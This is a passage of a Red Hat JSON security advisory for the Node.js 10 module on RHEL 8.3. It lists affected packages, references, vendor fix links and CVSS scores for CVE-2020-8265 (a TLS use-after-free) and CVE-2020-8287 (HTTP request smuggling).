"AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-docs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-8265" }, { "category": "external", "summary": "RHBZ#1912854", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1912854" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-8265", "url": "https://www.cve.org/CVERecord?id=CVE-2020-8265" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-8265", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-8265" }, { "category": "external", "summary": "https://hackerone.com/reports/988103", "url": "https://hackerone.com/reports/988103" } ], "release_date": "2021-01-04T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-16T14:25:46+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-docs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0548" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-docs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "nodejs: use-after-free in the TLS implementation" }, { "cve": "CVE-2020-8287", "cwe": { "id": "CWE-444", "name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)" }, "discovery_date": "2021-01-05T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1912863" } ], "notes": [ { "category": "description", "text": "A flaw was found in nodejs. Affected versions of Node.js allow two copies of a header field in an HTTP request. The first header field is recognized while the second is ignored leading to HTTP request smuggling. The highest threat from this vulnerability is to data confidentiality and integrity.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs: HTTP request smuggling via two copies of a header field in an http request", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-docs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-8287" }, { "category": "external", "summary": "RHBZ#1912863", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1912863" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-8287", "url": "https://www.cve.org/CVERecord?id=CVE-2020-8287" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-8287", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-8287" } ], "release_date": "2021-01-04T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-16T14:25:46+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-docs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0548" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "version": "3.1" }, "products": [ "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", 